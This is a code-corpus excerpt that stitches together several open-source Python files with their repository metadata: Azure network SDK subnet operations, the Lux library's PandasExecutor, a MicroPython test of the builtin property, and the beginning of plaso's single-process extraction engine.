return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_prepare_network_policies.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}/PrepareNetworkPolicies'} # type: ignore
def _unprepare_network_policies_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
unprepare_network_policies_request_parameters, # type: "_models.UnprepareNetworkPoliciesRequest"
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._unprepare_network_policies_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(unprepare_network_policies_request_parameters, 'UnprepareNetworkPoliciesRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_unprepare_network_policies_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}/UnprepareNetworkPolicies'} # type: ignore
def begin_unprepare_network_policies(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
unprepare_network_policies_request_parameters, # type: "_models.UnprepareNetworkPoliciesRequest"
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Unprepares a subnet by removing network intent policies.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param subnet_name: The name of the subnet.
:type subnet_name: str
:param unprepare_network_policies_request_parameters: Parameters supplied to unprepare subnet
to remove network intent policies.
:type unprepare_network_policies_request_parameters: ~azure.mgmt.network.v2020_07_01.models.UnprepareNetworkPoliciesRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._unprepare_network_policies_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
subnet_name=subnet_name,
unprepare_network_policies_request_parameters=unprepare_network_policies_request_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_unprepare_network_policies.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}/UnprepareNetworkPolicies'} # type: ignore
def list(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.SubnetListResult"]
"""Gets all subnets in a virtual network.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SubnetListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_07_01.models.SubnetListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SubnetListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('SubnetListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets'} # type: ignore
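# --- Hedged usage sketch (not part of the original file) ---------------------
# The class above is a vendored copy of the generated SubnetsOperations class;
# the public azure-mgmt-network package exposes an equivalent surface. A rough
# illustration of driving the long-running create/update and the get operation
# is sketched below. It assumes azure-identity and azure-mgmt-network are
# installed; the subscription id, resource group, and network names are
# placeholders.
from azure.identity import DefaultAzureCredential
from azure.mgmt.network import NetworkManagementClient
def example_create_subnet():
    client = NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>")
    poller = client.subnets.begin_create_or_update(
        "example-rg",
        "example-vnet",
        "example-subnet",
        {"address_prefix": "10.0.0.0/24"},
    )
    subnet = poller.result()  # blocks until the long-running operation completes
    return client.subnets.get("example-rg", "example-vnet", subnet.name)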
| 50.997151
| 255
| 0.66933
|
a73e607b5038ab37a293bdbff21d783ab8fde18b
| 22,975
|
py
|
Python
|
lux/executor/PandasExecutor.py
|
piyushg9794/lux
|
f5be470f5a4837db2746c950bebe2694665c25dc
|
[
"Apache-2.0"
] | null | null | null |
lux/executor/PandasExecutor.py
|
piyushg9794/lux
|
f5be470f5a4837db2746c950bebe2694665c25dc
|
[
"Apache-2.0"
] | null | null | null |
lux/executor/PandasExecutor.py
|
piyushg9794/lux
|
f5be470f5a4837db2746c950bebe2694665c25dc
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019-2020 The Lux Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pandas as pd
from lux.vis.VisList import VisList
from lux.vis.Vis import Vis
from lux.core.frame import LuxDataFrame
from lux.executor.Executor import Executor
from lux.utils import utils
from lux.utils.date_utils import is_datetime_series
from lux.utils.utils import check_import_lux_widget, check_if_id_like
from lux.utils.date_utils import is_datetime_series
import warnings
class PandasExecutor(Executor):
"""
Given a Vis objects with complete specifications, fetch and process data using Pandas dataframe operations.
"""
def __init__(self):
self.name = "PandasExecutor"
def __repr__(self):
return f"<PandasExecutor>"
@staticmethod
def execute_sampling(ldf: LuxDataFrame):
# General Sampling for entire dataframe
SAMPLE_START = 10000
SAMPLE_CAP = 30000
SAMPLE_FRAC = 0.75
if len(ldf) > SAMPLE_CAP:
if ldf._sampled is None: # memoize unfiltered sample df
ldf._sampled = ldf.sample(n=SAMPLE_CAP, random_state=1)
ldf._message.add_unique(
f"Large dataframe detected: Lux is only visualizing a random sample capped at {SAMPLE_CAP} rows.",
priority=99,
)
elif len(ldf) > SAMPLE_START:
if ldf._sampled is None: # memoize unfiltered sample df
ldf._sampled = ldf.sample(frac=SAMPLE_FRAC, random_state=1)
ldf._message.add_unique(
f"Large dataframe detected: Lux is only visualizing a random sample of {len(ldf._sampled)} rows.",
priority=99,
)
else:
ldf._sampled = ldf
@staticmethod
def execute(vislist: VisList, ldf: LuxDataFrame):
"""
Given a VisList, fetch the data required to render the vis.
1) Apply filters
2) Retrieve relevant attribute
3) Perform vis-related processing (aggregation, binning)
4) return a DataFrame with relevant results
Parameters
----------
vislist: list[lux.Vis]
vis list that contains lux.Vis objects for visualization.
ldf : lux.core.frame
LuxDataFrame with specified intent.
Returns
-------
None
"""
PandasExecutor.execute_sampling(ldf)
for vis in vislist:
# The vis data starts off being original or sampled dataframe
vis._vis_data = ldf._sampled
filter_executed = PandasExecutor.execute_filter(vis)
# Select relevant data based on attribute information
attributes = set([])
for clause in vis._inferred_intent:
if clause.attribute:
if clause.attribute != "Record":
attributes.add(clause.attribute)
# TODO: Add some type of cap size on Nrows ?
vis._vis_data = vis.data[list(attributes)]
if vis.mark == "bar" or vis.mark == "line":
PandasExecutor.execute_aggregate(vis, isFiltered=filter_executed)
elif vis.mark == "histogram":
PandasExecutor.execute_binning(vis)
elif vis.mark == "scatter":
HBIN_START = 5000
if len(ldf) > HBIN_START:
vis._postbin = True
ldf._message.add_unique(
f"Large scatterplots detected: Lux is automatically binning scatterplots to heatmaps.",
priority=98,
)
# vis._mark = "heatmap"
# PandasExecutor.execute_2D_binning(vis) # Lazy Evaluation (Early pruning based on interestingness)
@staticmethod
def execute_aggregate(vis: Vis, isFiltered=True):
"""
Aggregate data points on an axis for bar or line charts
Parameters
----------
vis: lux.Vis
lux.Vis object that represents a visualization
ldf : lux.core.frame
LuxDataFrame with specified intent.
Returns
-------
None
"""
import numpy as np
x_attr = vis.get_attr_by_channel("x")[0]
y_attr = vis.get_attr_by_channel("y")[0]
has_color = False
groupby_attr = ""
measure_attr = ""
if x_attr.aggregation is None or y_attr.aggregation is None:
return
if y_attr.aggregation != "":
groupby_attr = x_attr
measure_attr = y_attr
agg_func = y_attr.aggregation
if x_attr.aggregation != "":
groupby_attr = y_attr
measure_attr = x_attr
agg_func = x_attr.aggregation
if groupby_attr.attribute in vis.data.unique_values.keys():
attr_unique_vals = vis.data.unique_values[groupby_attr.attribute]
# checks if color is specified in the Vis
if len(vis.get_attr_by_channel("color")) == 1:
color_attr = vis.get_attr_by_channel("color")[0]
color_attr_vals = vis.data.unique_values[color_attr.attribute]
color_cardinality = len(color_attr_vals)
# NOTE: might want to have a check somewhere to not use categorical variables with greater than some number of categories as a Color variable----------------
has_color = True
else:
color_cardinality = 1
if measure_attr != "":
if measure_attr.attribute == "Record":
vis._vis_data = vis.data.reset_index()
# if color is specified, need to group by groupby_attr and color_attr
if has_color:
vis._vis_data = (
vis.data.groupby([groupby_attr.attribute, color_attr.attribute])
.count()
.reset_index()
)
vis._vis_data = vis.data.rename(columns={"index": "Record"})
vis._vis_data = vis.data[[groupby_attr.attribute, color_attr.attribute, "Record"]]
else:
vis._vis_data = vis.data.groupby(groupby_attr.attribute).count().reset_index()
vis._vis_data = vis.data.rename(columns={"index": "Record"})
vis._vis_data = vis.data[[groupby_attr.attribute, "Record"]]
else:
# if color is specified, need to group by groupby_attr and color_attr
if has_color:
groupby_result = vis.data.groupby([groupby_attr.attribute, color_attr.attribute])
else:
groupby_result = vis.data.groupby(groupby_attr.attribute)
groupby_result = groupby_result.agg(agg_func)
intermediate = groupby_result.reset_index()
vis._vis_data = intermediate.__finalize__(vis.data)
result_vals = list(vis.data[groupby_attr.attribute])
# create existing group by attribute combinations if color is specified
# this is needed to check what combinations of group_by_attr and color_attr values have a non-zero number of elements in them
if has_color:
res_color_combi_vals = []
result_color_vals = list(vis.data[color_attr.attribute])
for i in range(0, len(result_vals)):
res_color_combi_vals.append([result_vals[i], result_color_vals[i]])
            # For filtered aggregations that are missing groupby-attribute values, set the aggregated value to 0, since there are no data points
if isFiltered or has_color and attr_unique_vals:
N_unique_vals = len(attr_unique_vals)
if len(result_vals) != N_unique_vals * color_cardinality:
columns = vis.data.columns
if has_color:
df = pd.DataFrame(
{
columns[0]: attr_unique_vals * color_cardinality,
columns[1]: pd.Series(color_attr_vals).repeat(N_unique_vals),
}
)
vis._vis_data = vis.data.merge(
df,
on=[columns[0], columns[1]],
how="right",
suffixes=["", "_right"],
)
for col in columns[2:]:
vis.data[col] = vis.data[col].fillna(0) # Triggers __setitem__
assert len(list(vis.data[groupby_attr.attribute])) == N_unique_vals * len(
color_attr_vals
), f"Aggregated data missing values compared to original range of values of `{groupby_attr.attribute, color_attr.attribute}`."
# Keep only the three relevant columns not the *_right columns resulting from merge
vis._vis_data = vis.data.iloc[:, :3]
else:
df = pd.DataFrame({columns[0]: attr_unique_vals})
vis._vis_data = vis.data.merge(
df, on=columns[0], how="right", suffixes=["", "_right"]
)
for col in columns[1:]:
vis.data[col] = vis.data[col].fillna(0)
assert (
len(list(vis.data[groupby_attr.attribute])) == N_unique_vals
), f"Aggregated data missing values compared to original range of values of `{groupby_attr.attribute}`."
vis._vis_data = vis.data.sort_values(by=groupby_attr.attribute, ascending=True)
vis._vis_data = vis.data.reset_index()
vis._vis_data = vis.data.drop(columns="index")
@staticmethod
def execute_binning(vis: Vis):
"""
Binning of data points for generating histograms
Parameters
----------
vis: lux.Vis
lux.Vis object that represents a visualization
ldf : lux.core.frame
LuxDataFrame with specified intent.
Returns
-------
None
"""
import numpy as np
bin_attribute = list(filter(lambda x: x.bin_size != 0, vis._inferred_intent))[0]
bin_attr = bin_attribute.attribute
if not np.isnan(vis.data[bin_attr]).all():
# np.histogram breaks if array contain NaN
series = vis.data[bin_attr].dropna()
            # TODO: binning runs for the name attribute. Name attribute has datatype quantitative which is wrong.
counts, bin_edges = np.histogram(series, bins=bin_attribute.bin_size)
# bin_edges of size N+1, so need to compute bin_center as the bin location
bin_center = np.mean(np.vstack([bin_edges[0:-1], bin_edges[1:]]), axis=0)
# TODO: Should vis.data be a LuxDataFrame or a Pandas DataFrame?
binned_result = np.array([bin_center, counts]).T
vis._vis_data = pd.DataFrame(binned_result, columns=[bin_attr, "Number of Records"])
@staticmethod
def execute_filter(vis: Vis):
assert (
vis.data is not None
), "execute_filter assumes input vis.data is populated (if not, populate with LuxDataFrame values)"
filters = utils.get_filter_specs(vis._inferred_intent)
if filters:
# TODO: Need to handle OR logic
for filter in filters:
vis._vis_data = PandasExecutor.apply_filter(
vis.data, filter.attribute, filter.filter_op, filter.value
)
return True
else:
return False
@staticmethod
def apply_filter(df: pd.DataFrame, attribute: str, op: str, val: object) -> pd.DataFrame:
"""
Helper function for applying filter to a dataframe
Parameters
----------
df : pandas.DataFrame
Dataframe to filter on
attribute : str
Filter attribute
op : str
Filter operation, '=', '<', '>', '<=', '>=', '!='
val : object
Filter value
Returns
-------
df: pandas.DataFrame
Dataframe resulting from the filter operation
"""
if op == "=":
return df[df[attribute] == val]
elif op == "<":
return df[df[attribute] < val]
elif op == ">":
return df[df[attribute] > val]
elif op == "<=":
return df[df[attribute] <= val]
elif op == ">=":
return df[df[attribute] >= val]
elif op == "!=":
return df[df[attribute] != val]
return df
@staticmethod
def execute_2D_binning(vis: Vis):
pd.reset_option("mode.chained_assignment")
with pd.option_context("mode.chained_assignment", None):
x_attr = vis.get_attr_by_channel("x")[0].attribute
y_attr = vis.get_attr_by_channel("y")[0].attribute
vis._vis_data["xBin"] = pd.cut(vis._vis_data[x_attr], bins=40)
vis._vis_data["yBin"] = pd.cut(vis._vis_data[y_attr], bins=40)
color_attr = vis.get_attr_by_channel("color")
if len(color_attr) > 0:
color_attr = color_attr[0]
groups = vis._vis_data.groupby(["xBin", "yBin"])[color_attr.attribute]
if color_attr.data_type == "nominal":
                    # Compute mode and count. Mode aggregates each cell by taking the majority vote for the category variable. In cases where there are ties across categories, pick the first item (.iat[0])
result = groups.agg(
[
("count", "count"),
(color_attr.attribute, lambda x: pd.Series.mode(x).iat[0]),
]
).reset_index()
elif color_attr.data_type == "quantitative":
# Compute the average of all values in the bin
result = groups.agg(
[("count", "count"), (color_attr.attribute, "mean")]
).reset_index()
result = result.dropna()
else:
groups = vis._vis_data.groupby(["xBin", "yBin"])[x_attr]
result = groups.count().reset_index(name=x_attr)
result = result.rename(columns={x_attr: "count"})
result = result[result["count"] != 0]
# convert type to facilitate weighted correlation interestingess calculation
result["xBinStart"] = result["xBin"].apply(lambda x: x.left).astype("float")
result["xBinEnd"] = result["xBin"].apply(lambda x: x.right)
result["yBinStart"] = result["yBin"].apply(lambda x: x.left).astype("float")
result["yBinEnd"] = result["yBin"].apply(lambda x: x.right)
vis._vis_data = result.drop(columns=["xBin", "yBin"])
#######################################################
############ Metadata: data type, model #############
#######################################################
def compute_dataset_metadata(self, ldf: LuxDataFrame):
ldf.data_type_lookup = {}
ldf.data_type = {}
self.compute_data_type(ldf)
ldf.data_model_lookup = {}
ldf.data_model = {}
self.compute_data_model(ldf)
def compute_data_type(self, ldf: LuxDataFrame):
from pandas.api.types import is_datetime64_any_dtype as is_datetime
for attr in list(ldf.columns):
temporal_var_list = ["month", "year", "day", "date", "time"]
if is_datetime(ldf[attr]):
ldf.data_type_lookup[attr] = "temporal"
elif self._is_datetime_string(ldf[attr]):
ldf.data_type_lookup[attr] = "temporal"
elif isinstance(attr, pd._libs.tslibs.timestamps.Timestamp):
ldf.data_type_lookup[attr] = "temporal"
elif str(attr).lower() in temporal_var_list:
ldf.data_type_lookup[attr] = "temporal"
elif pd.api.types.is_float_dtype(ldf.dtypes[attr]):
ldf.data_type_lookup[attr] = "quantitative"
elif pd.api.types.is_integer_dtype(ldf.dtypes[attr]):
                # See if integer value is quantitative or nominal by checking if the ratio of cardinality/data size is less than 0.4 and if there are fewer than 20 unique values
if ldf.pre_aggregated:
if ldf.cardinality[attr] == len(ldf):
ldf.data_type_lookup[attr] = "nominal"
if ldf.cardinality[attr] / len(ldf) < 0.4 and ldf.cardinality[attr] < 20:
ldf.data_type_lookup[attr] = "nominal"
else:
ldf.data_type_lookup[attr] = "quantitative"
if check_if_id_like(ldf, attr):
ldf.data_type_lookup[attr] = "id"
# Eliminate this clause because a single NaN value can cause the dtype to be object
elif pd.api.types.is_string_dtype(ldf.dtypes[attr]):
if check_if_id_like(ldf, attr):
ldf.data_type_lookup[attr] = "id"
else:
ldf.data_type_lookup[attr] = "nominal"
# check if attribute is any type of datetime dtype
elif is_datetime_series(ldf.dtypes[attr]):
ldf.data_type_lookup[attr] = "temporal"
else:
ldf.data_type_lookup[attr] = "nominal"
# for attr in list(df.dtypes[df.dtypes=="int64"].keys()):
# if self.cardinality[attr]>50:
if ldf.index.dtype != "int64" and ldf.index.name:
ldf.data_type_lookup[ldf.index.name] = "nominal"
ldf.data_type = self.mapping(ldf.data_type_lookup)
non_datetime_attrs = []
for attr in ldf.columns:
if ldf.data_type_lookup[attr] == "temporal" and not is_datetime(ldf[attr]):
non_datetime_attrs.append(attr)
if len(non_datetime_attrs) == 1:
warnings.warn(
f"\nLux detects that the attribute '{non_datetime_attrs[0]}' may be temporal.\n"
"In order to display visualizations for this attribute accurately, temporal attributes should be converted to Pandas Datetime objects.\n\n"
"Please consider converting this attribute using the pd.to_datetime function and providing a 'format' parameter to specify datetime format of the attribute.\n"
"For example, you can convert the 'month' attribute in a dataset to Datetime type via the following command:\n\n\t df['month'] = pd.to_datetime(df['month'], format='%m')\n\n"
"See more at: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.to_datetime.html\n",
stacklevel=2,
)
elif len(non_datetime_attrs) > 1:
warnings.warn(
f"\nLux detects that attributes {non_datetime_attrs} may be temporal.\n"
"In order to display visualizations for these attributes accurately, temporal attributes should be converted to Pandas Datetime objects.\n\n"
"Please consider converting these attributes using the pd.to_datetime function and providing a 'format' parameter to specify datetime format of the attribute.\n"
"For example, you can convert the 'month' attribute in a dataset to Datetime type via the following command:\n\n\t df['month'] = pd.to_datetime(df['month'], format='%m')\n\n"
"See more at: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.to_datetime.html\n",
stacklevel=2,
)
def _is_datetime_string(self, series):
if len(series) > 100:
series = series.sample(100)
if series.dtype == object:
not_numeric = False
try:
pd.to_numeric(series)
except Exception as e:
not_numeric = True
datetime_col = None
if not_numeric:
try:
datetime_col = pd.to_datetime(series)
except Exception as e:
return False
if datetime_col is not None:
return True
return False
def compute_data_model(self, ldf: LuxDataFrame):
ldf.data_model = {
"measure": ldf.data_type["quantitative"],
"dimension": ldf.data_type["nominal"] + ldf.data_type["temporal"] + ldf.data_type["id"],
}
ldf.data_model_lookup = self.reverseMapping(ldf.data_model)
def compute_stats(self, ldf: LuxDataFrame):
# precompute statistics
ldf.unique_values = {}
ldf._min_max = {}
ldf.cardinality = {}
for attribute in ldf.columns:
if isinstance(attribute, pd._libs.tslibs.timestamps.Timestamp):
# If timestamp, make the dictionary keys the _repr_ (e.g., TimeStamp('2020-04-05 00.000')--> '2020-04-05')
attribute_repr = str(attribute._date_repr)
else:
attribute_repr = attribute
ldf.unique_values[attribute_repr] = list(ldf[attribute_repr].unique())
ldf.cardinality[attribute_repr] = len(ldf.unique_values[attribute_repr])
# commenting this optimization out to make sure I can filter by cardinality when showing recommended vis
# if ldf.dtypes[attribute] != "float64":# and not pd.api.types.is_datetime64_ns_dtype(self.dtypes[attribute]):
# ldf.unique_values[attribute_repr] = list(ldf[attribute].unique())
# ldf.cardinality[attribute_repr] = len(ldf.unique_values[attribute])
# else:
# ldf.cardinality[attribute_repr] = 999 # special value for non-numeric attribute
if ldf.dtypes[attribute] == "float64" or ldf.dtypes[attribute] == "int64":
ldf._min_max[attribute_repr] = (
ldf[attribute].min(),
ldf[attribute].max(),
)
if ldf.index.dtype != "int64":
index_column_name = ldf.index.name
ldf.unique_values[index_column_name] = list(ldf.index)
ldf.cardinality[index_column_name] = len(ldf.index)
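# --- Hedged usage sketch (not part of the original file) ---------------------
# apply_filter is a plain staticmethod over a pandas DataFrame, so it can be
# exercised without building a Vis object. The column names and values below
# are made up for illustration.
if __name__ == "__main__":
    toy = pd.DataFrame({"Origin": ["USA", "Japan", "USA"], "Horsepower": [130, 95, 150]})
    print(PandasExecutor.apply_filter(toy, "Origin", "=", "USA"))
    print(PandasExecutor.apply_filter(toy, "Horsepower", ">=", 100))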
| 46.134538
| 204
| 0.574712
|
4df9842a3e40a7b2a143d57529408f9815ebd34a
| 1,132
|
py
|
Python
|
tests/basics/builtin_property.py
|
0x0ece/micropython
|
4ee07f4883136dfbd1795dea3b04c478072d5630
|
[
"MIT"
] | 303
|
2015-07-11T17:12:55.000Z
|
2018-01-08T03:02:37.000Z
|
python/micropython/tests/basics/builtin_property.py
|
r-lyeh/script-it
|
cd7b259ccbd14d05c8d8fec1a33af9de5337e60c
|
[
"Unlicense"
] | 13
|
2016-05-12T16:51:22.000Z
|
2018-01-10T22:33:25.000Z
|
python/micropython/tests/basics/builtin_property.py
|
r-lyeh/script-it
|
cd7b259ccbd14d05c8d8fec1a33af9de5337e60c
|
[
"Unlicense"
] | 26
|
2018-01-18T09:15:33.000Z
|
2022-02-07T13:09:14.000Z
|
# test builtin property
# create a property object explicitly
property()
property(1, 2, 3)
# use its accessor methods
p = property()
p.getter(1)
p.setter(2)
p.deleter(3)
# basic use as a decorator
class A:
def __init__(self, x):
self._x = x
@property
def x(self):
print("x get")
return self._x
a = A(1)
print(a.x)
try:
a.x = 2
except AttributeError:
print("AttributeError")
# explicit use within a class
class B:
def __init__(self, x):
self._x = x
def xget(self):
print("x get")
return self._x
def xset(self, value):
print("x set")
self._x = value
def xdel(self):
print("x del")
x = property(xget, xset, xdel)
b = B(3)
print(b.x)
b.x = 4
print(b.x)
del b.x
# full use as a decorator
class C:
def __init__(self, x):
self._x = x
@property
def x(self):
print("x get")
return self._x
@x.setter
def x(self, value):
print("x set")
self._x = value
@x.deleter
def x(self):
print("x del")
c = C(5)
print(c.x)
c.x = 6
print(c.x)
del c.x
| 14.329114
| 37
| 0.553004
|
ff9d5bcb4bc6f302bcd5232a86402a0f72522120
| 14,239
|
py
|
Python
|
plaso/single_process/extraction_engine.py
|
jonathan-greig/plaso
|
b88a6e54c06a162295d09b016bddbfbfe7ca9070
|
[
"Apache-2.0"
] | 6
|
2015-07-30T11:07:24.000Z
|
2021-07-23T07:12:30.000Z
|
plaso/single_process/extraction_engine.py
|
jonathan-greig/plaso
|
b88a6e54c06a162295d09b016bddbfbfe7ca9070
|
[
"Apache-2.0"
] | null | null | null |
plaso/single_process/extraction_engine.py
|
jonathan-greig/plaso
|
b88a6e54c06a162295d09b016bddbfbfe7ca9070
|
[
"Apache-2.0"
] | 1
|
2021-07-23T07:12:37.000Z
|
2021-07-23T07:12:37.000Z
|
# -*- coding: utf-8 -*-
"""The single process extraction engine."""
import collections
import os
import pdb
import threading
import time
from dfvfs.lib import definitions as dfvfs_definitions
from dfvfs.lib import errors as dfvfs_errors
from dfvfs.resolver import resolver
from plaso.containers import counts
from plaso.containers import event_sources
from plaso.engine import engine
from plaso.engine import extractors
from plaso.engine import logger
from plaso.engine import process_info
from plaso.engine import worker
from plaso.lib import definitions
from plaso.parsers import mediator as parsers_mediator
class SingleProcessEngine(engine.BaseEngine):
"""Single process extraction engine."""
# Maximum number of dfVFS file system objects to cache.
_FILE_SYSTEM_CACHE_SIZE = 3
def __init__(self):
"""Initializes a single process extraction engine."""
super(SingleProcessEngine, self).__init__()
self._current_display_name = ''
self._extraction_worker = None
self._file_system_cache = []
self._number_of_consumed_sources = 0
self._parser_mediator = None
self._parsers_counter = None
self._path_spec_extractor = extractors.PathSpecExtractor()
self._pid = os.getpid()
self._process_information = process_info.ProcessInfo(self._pid)
self._processing_configuration = None
self._resolver_context = None
self._status = definitions.STATUS_INDICATOR_IDLE
self._status_update_active = False
self._status_update_callback = None
self._status_update_thread = None
self._storage_writer = None
def _CacheFileSystem(self, path_spec):
"""Caches a dfVFS file system object.
    Keeping an additional reference to a dfVFS file system object causes the
    object to remain cached in the resolver context. This minimizes the number
    of times the file system is re-opened.
Args:
path_spec (dfvfs.PathSpec): path specification.
"""
if (path_spec and not path_spec.IsSystemLevel() and
path_spec.type_indicator != dfvfs_definitions.TYPE_INDICATOR_GZIP):
      file_system = resolver.Resolver.OpenFileSystem(
path_spec, resolver_context=self._resolver_context)
if file_system not in self._file_system_cache:
if len(self._file_system_cache) == self._FILE_SYSTEM_CACHE_SIZE:
self._file_system_cache.pop(0)
self._file_system_cache.append(file_system)
elif len(self._file_system_cache) == self._FILE_SYSTEM_CACHE_SIZE:
        # Move the file system to the end of the list to preserve the most
        # recently used file system object.
self._file_system_cache.remove(file_system)
self._file_system_cache.append(file_system)
def _ProcessPathSpec(self, extraction_worker, parser_mediator, path_spec):
"""Processes a path specification.
Args:
extraction_worker (worker.ExtractionWorker): extraction worker.
parser_mediator (ParserMediator): parser mediator.
